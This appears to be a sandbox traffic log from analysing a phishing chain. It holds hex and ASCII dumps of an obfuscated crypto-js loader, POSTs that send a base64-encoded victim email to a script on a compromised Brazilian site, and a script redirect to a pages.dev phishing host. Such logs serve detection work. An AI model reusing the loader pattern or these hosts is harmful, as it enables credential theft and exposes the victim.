                                                                2024-08-27 18:11:18 UTC8010INData Raw: 33 65 33 66 0d 0a 76 61 72 20 65 6d 70 68 61 73 69 73 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 65 6d 70 68 61 73 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 65 6d 70 68 61 73 69 73 29 3b 0d 0a 65 6d 70 68 61 73 69 73 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 22
                                                                Data Ascii: 3e3fvar emphasis= document.createElement("script");emphasis.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(emphasis);emphasis.onload=function(){var {a,b,c,d} = JSON.parse(atob("
                                                                2024-08-27 18:11:19 UTC7931INData Raw: 71 4d 56 41 7a 52 69 74 7a 55 6e 4e 49 53 6d 4e 33 54 45 74 4c 52 48 4d 35 55 56 70 7a 4f 56 4e 76 4d 45 77 31 62 57 56 56 4d 6d 46 44 5a 30 55 35 65 6c 52 52 65 45 64 31 59 7a 55 72 62 6b 52 7a 57 44 6b 79 59 6e 5a 43 64 30 70 58 54 46 42 63 4c 32 59 72 53 56 52 45 51 32 70 30 4e 46 77 76 5a 48 70 4b 4e 43 74 76 4e 32 4a 68 64 57 5a 63 4c 31 77 76 52 45 35 30 64 31 52 42 57 6a 56 56 63 45 6c 49 62 30 52 32 4d 58 46 43 63 30 74 46 62 6d 6c 76 55 6d 68 45 5a 30 68 35 4d 7a 6c 4f 4f 45 56 47 4e 30 4e 78 4b 33 70 47 63 46 64 70 51 33 6b 34 55 6d 5a 4d 65 45 56 59 5a 6d 4a 56 4d 46 5a 76 53 43 74 31 64 6a 46 33 4e 56 4a 70 62 6b 31 45 59 7a 5a 56 57 46 52 75 57 58 4a 51 5a 44 6b 7a 59 56 64 45 4e 46 64 44 61 31 4a 79 52 6c 6c 5a 52 45 46 46 51 30 4e 74 63 55
                                                                Data Ascii: qMVAzRitzUnNISmN3TEtLRHM5UVpzOVNvMEw1bWVVMmFDZ0U5elRReEd1YzUrbkRzWDkyYnZCd0pXTFBcL2YrSVREQ2p0NFwvZHpKNCtvN2JhdWZcL1wvRE50d1RBWjVVcElIb0R2MXFCc0tFbmlvUmhEZ0h5MzlOOEVGN0NxK3pGcFdpQ3k4UmZMeEVYZmJVMFZvSCt1djF3NVJpbk1EYzZVWFRuWXJQZDkzYVdENFdDa1JyRllZREFFQ0NtcU
                                                                2024-08-27 18:11:19 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:11:19 UTC8192INData Raw: 31 66 34 30 0d 0a 70 75 64 6d 4a 6d 4d 6b 64 6e 59 58 42 45 54 44 4e 30 4d 6d 64 52 62 48 68 72 54 33 4e 76 57 57 35 75 63 7a 4a 6d 61 30 64 43 65 6c 64 78 54 56 52 79 52 55 31 75 4f 45 46 61 5a 47 78 74 62 6d 5a 45 54 6b 4e 79 51 7a 46 42 58 43 39 72 52 30 51 7a 5a 6a 46 49 4f 48 64 58 52 31 46 42 57 6a 56 6f 64 57 70 47 4d 54 4d 77 61 30 6c 50 56 57 4e 61 65 6c 4a 75 61 6d 64 71 64 7a 42 74 62 7a 4d 34 56 57 56 72 5a 57 64 46 4b 33 64 63 4c 30 73 77 4f 48 70 55 63 6d 4e 34 63 56 64 73 63 57 56 33 4e 57 4a 4d 61 57 6c 63 4c 30 46 45 62 32 64 44 63 6d 70 43 5a 30 49 35 51 6d 64 45 64 45 4e 48 55 46 6c 5a 54 57 4a 6c 65 6b 4a 30 5a 55 31 34 56 55 39 6b 59 58 4a 6a 53 31 6b 7a 63 30 46 61 63 45 46 56 52 46 4e 61 61 32 34 30 59 31 77 76 58 43 39 63 4c 79 74
                                                                Data Ascii: 1f40pudmJmMkdnYXBETDN0MmdRbHhrT3NvWW5uczJma0dCeldxTVRyRU1uOEFaZGxtbmZETkNyQzFBXC9rR0QzZjFIOHdXR1FBWjVodWpGMTMwa0lPVWNaelJuamdqdzBtbzM4VWVrZWdFK3dcL0swOHpUcmN4cVdscWV3NWJMaWlcL0FEb2dDcmpCZ0I5QmdEdENHUFlZTWJlekJ0ZU14VU9kYXJjS1kzc0FacEFVRFNaa240Y1wvXC9cLyt
                                                                2024-08-27 18:11:19 UTC7822INData Raw: 4e 6d 4a 44 54 30 64 55 5a 46 4e 31 56 57 52 50 52 31 4a 34 52 6e 64 72 61 32 49 7a 4e 46 5a 76 56 6e 4a 50 64 48 51 7a 54 30 46 77 57 53 74 51 63 6a 46 72 58 43 39 50 57 56 56 42 65 46 42 7a 54 6b 31 4b 65 6e 68 4a 53 6b 64 55 55 6c 56 43 59 58 4a 72 55 54 4a 44 52 47 52 69 55 56 64 48 62 47 35 4b 65 6e 5a 79 53 58 68 53 4d 56 46 70 57 6d 51 35 53 33 6c 6f 52 32 52 69 58 43 39 42 53 58 46 46 5a 6e 46 73 51 6e 5a 7a 64 6b 70 36 62 55 39 49 4d 55 68 42 62 45 68 6b 65 54 56 72 51 31 52 36 52 47 6f 33 57 58 70 57 57 6a 52 56 4e 6b 6f 31 53 55 6c 6f 56 33 63 72 65 6b 52 4f 52 7a 68 4f 55 32 4d 30 56 44 5a 69 61 6e 70 34 58 43 39 57 63 31 52 63 4c 30 64 4b 58 43 38 31 4e 56 4a 4e 64 32 52 31 51 57 35 47 52 56 68 4f 55 57 52 5a 4e 43 73 34 5a 55 74 63 4c 7a 52
                                                                Data Ascii: NmJDT0dUZFN1VWRPR1J4Rndra2IzNFZvVnJPdHQzT0FwWStQcjFrXC9PWVVBeFBzTk1KenhJSkdUUlVCYXJrUTJDRGRiUVdHbG5KenZySXhSMVFpWmQ5S3loR2RiXC9BSXFFZnFsQnZzdkp6bU9IMUhBbEhkeTVrQ1R6RGo3WXpWWjRVNko1SUloV3crekRORzhOU2M0VDZianp4XC9Wc1RcL0dKXC81NVJNd2R1QW5GRVhOUWRZNCs4ZUtcLzR
                                                                2024-08-27 18:11:19 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:11:19 UTC1572INData Raw: 36 31 64 0d 0a 5a 48 57 55 52 42 65 6b 6c 35 64 30 46 59 61 54 52 50 51 30 4e 4c 54 48 70 6b 53 45 4d 34 5a 6d 68 4b 52 7a 42 79 58 43 39 48 57 58 52 49 54 6e 42 52 59 6b 4e 74 53 6d 73 33 4d 33 56 6b 59 58 42 34 64 48 68 4f 57 6b 6f 32 65 48 4e 71 62 45 5a 43 63 6b 56 75 65 55 4e 4d 59 33 56 4c 59 58 49 32 52 44 4e 4d 58 43 39 71 63 57 70 36 54 46 46 54 59 6a 56 74 51 56 56 58 63 6b 4e 6b 62 7a 64 72 4d 7a 52 48 64 31 52 73 52 32 4a 68 65 46 5a 6b 63 6e 46 73 51 6e 4d 7a 65 55 46 63 4c 32 46 45 54 7a 4a 6e 52 6d 56 61 64 32 70 5a 51 7a 6c 49 56 55 5a 6a 51 54 42 4a 5a 55 56 4e 62 31 49 79 57 6d 56 43 56 33 56 6f 62 6d 6c 76 51 31 49 34 62 44 6b 34 52 32 4e 73 52 33 6c 54 64 45 4a 32 52 48 70 73 62 32 31 6e 5a 30 74 30 56 48 4a 4d 59 6d 46 4a 59 56 56 33
                                                                Data Ascii: 61dZHWURBekl5d0FYaTRPQ0NLTHpkSEM4ZmhKRzByXC9HWXRITnBRYkNtSms3M3VkYXB4dHhOWko2eHNqbEZCckVueUNMY3VLYXI2RDNMXC9qcWp6TFFTYjVtQVVXckNkbzdrMzRHd1RsR2JheFZkcnFsQnMzeUFcL2FETzJnRmVad2pZQzlIVUZjQTBJZUVNb1IyWmVCV3VobmlvQ1I4bDk4R2NsR3lTdEJ2RHpsb21nZ0t0VHJMYmFJYVV3
                                                                2024-08-27 18:11:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549723184.28.90.27443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: fs.microsoft.com
                                                                2024-08-27 18:11:20 UTC466INHTTP/1.1 200 OK
                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                Content-Type: application/octet-stream
                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                Server: ECAcc (lpl/EF17)
                                                                X-CID: 11
                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                X-Ms-Region: prod-weu-z1
                                                                Cache-Control: public, max-age=77346
                                                                Date: Tue, 27 Aug 2024 18:11:20 GMT
                                                                Connection: close
                                                                X-CID: 2


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.54972445.164.92.1884436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:20 UTC791OUTPOST /js/images/tvavx.php HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                Content-Length: 217
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                Origin: null
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:20 UTC217OUTData Raw: 63 6f 64 3d 34 34 36 33 36 63 34 32 34 33 37 33 34 31 37 37 34 34 34 31 35 30 34 32 34 38 37 39 35 38 33 33 32 66 37 33 35 61 34 36 36 62 35 39 37 39 36 38 34 61 36 31 34 34 35 31 33 39 33 39 36 35 35 38 35 30 36 33 37 61 36 64 34 66 36 34 37 36 35 38 36 65 34 61 34 37 36 66 34 62 34 35 34 64 36 38 35 36 33 31 34 39 36 37 34 64 37 31 36 39 37 33 34 34 36 63 34 38 37 31 35 34 33 37 36 63 35 61 34 33 36 32 33 38 35 30 36 32 33 38 34 65 36 61 36 38 33 35 35 39 34 38 33 31 36 61 36 34 32 66 26 65 3d 59 32 46 79 62 32 78 70 62 6d 55 75 64 6d 6c 68 62 6d 35 68 51 47 64 73 62 32 4a 68 62 47 5a 76 64 57 35 6b 63 6d 6c 6c 63 79 35 6a 62 32 30 25 33 44
                                                                Data Ascii: cod=44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f&e=Y2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20%3D
                                                                2024-08-27 18:11:21 UTC191INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:20 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                2024-08-27 18:11:21 UTC2176INData Raw: 38 37 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 6d 61 72 67 69 6e 3a
                                                                Data Ascii: 879<html><head><meta name="robots" content="noindex, nofollow"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><style>body,html{margin:
                                                                2024-08-27 18:11:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.549726184.28.90.27443
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:20 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                Range: bytes=0-2147483646
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: fs.microsoft.com
                                                                2024-08-27 18:11:21 UTC514INHTTP/1.1 200 OK
                                                                ApiVersion: Distribute 1.1
                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                Content-Type: application/octet-stream
                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                Server: ECAcc (lpl/EF06)
                                                                X-CID: 11
                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                X-Ms-Region: prod-weu-z1
                                                                Cache-Control: public, max-age=81259
                                                                Date: Tue, 27 Aug 2024 18:11:21 GMT
                                                                Content-Length: 55
                                                                Connection: close
                                                                X-CID: 2
                                                                2024-08-27 18:11:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.54972545.164.92.1884436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:21 UTC639OUTGET /favicon.ico HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:21 UTC164INHTTP/1.1 404 Not Found
                                                                Date: Tue, 27 Aug 2024 18:11:20 GMT
                                                                Server: Apache
                                                                Content-Length: 315
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                2024-08-27 18:11:21 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.54972745.164.92.1884436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:23 UTC899OUTPOST /js/images/tvavx.php HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                Content-Length: 215
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                Origin: https://www.estampariaimagemeacao.com.br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:23 UTC215OUTData Raw: 61 3d 34 34 36 33 36 63 34 32 34 33 37 33 34 31 37 37 34 34 34 31 35 30 34 32 34 38 37 39 35 38 33 33 32 66 37 33 35 61 34 36 36 62 35 39 37 39 36 38 34 61 36 31 34 34 35 31 33 39 33 39 36 35 35 38 35 30 36 33 37 61 36 64 34 66 36 34 37 36 35 38 36 65 34 61 34 37 36 66 34 62 34 35 34 64 36 38 35 36 33 31 34 39 36 37 34 64 37 31 36 39 37 33 34 34 36 63 34 38 37 31 35 34 33 37 36 63 35 61 34 33 36 32 33 38 35 30 36 32 33 38 34 65 36 61 36 38 33 35 35 39 34 38 33 31 36 61 36 34 32 66 26 62 3d 59 32 46 79 62 32 78 70 62 6d 55 75 64 6d 6c 68 62 6d 35 68 51 47 64 73 62 32 4a 68 62 47 5a 76 64 57 35 6b 63 6d 6c 6c 63 79 35 6a 62 32 30 25 33 44
                                                                Data Ascii: a=44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f&b=Y2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20%3D
                                                                2024-08-27 18:11:23 UTC176INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:22 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html
                                                                2024-08-27 18:11:23 UTC174INData Raw: 61 38 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 68 64 6a 61 6a 73 64 67 61 67 73 6a 68 66 67 64 66 64 68 61 66 67 68 6a 61 66 67 66 64 6a 67 61 68 64 66 67 73 67 64 66 67 68 64 73 6e 6d 66 62 73 64 73 2e 70 61 67 65 73 2e 64 65 76 2f 23 59 59 32 46 79 62 32 78 70 62 6d 55 75 64 6d 6c 68 62 6d 35 68 51 47 64 73 62 32 4a 68 62 47 5a 76 64 57 35 6b 63 6d 6c 6c 63 79 35 6a 62 32 30 3d 22 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                Data Ascii: a8<script>window.top.location.href = "https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=";</script>
                                                                2024-08-27 18:11:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.549730172.66.47.1114436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:24 UTC743OUTGET / HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://www.estampariaimagemeacao.com.br/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:24 UTC786INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:24 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oZdkw7CsGJKuWs%2FlnJOM%2FuroYk3sETB1%2FpoxJpXqw7RfLgXC0saoD2kUOX3QwsWHxKUugyIx2EebJiSdtdqNogqoe13b%2BWGHFlKh9rHgK9ZoIHrK%2BXYsSXmmOdvuJYH3%2Fh8o6JjDfzyBJe3qFvUT4lfj3Sr7e3KrPJqDpE2Xwz7G7sggDicYQClbRFrZklg7MQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e061d2a368c2f-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:24 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:11:24 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:11:24 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
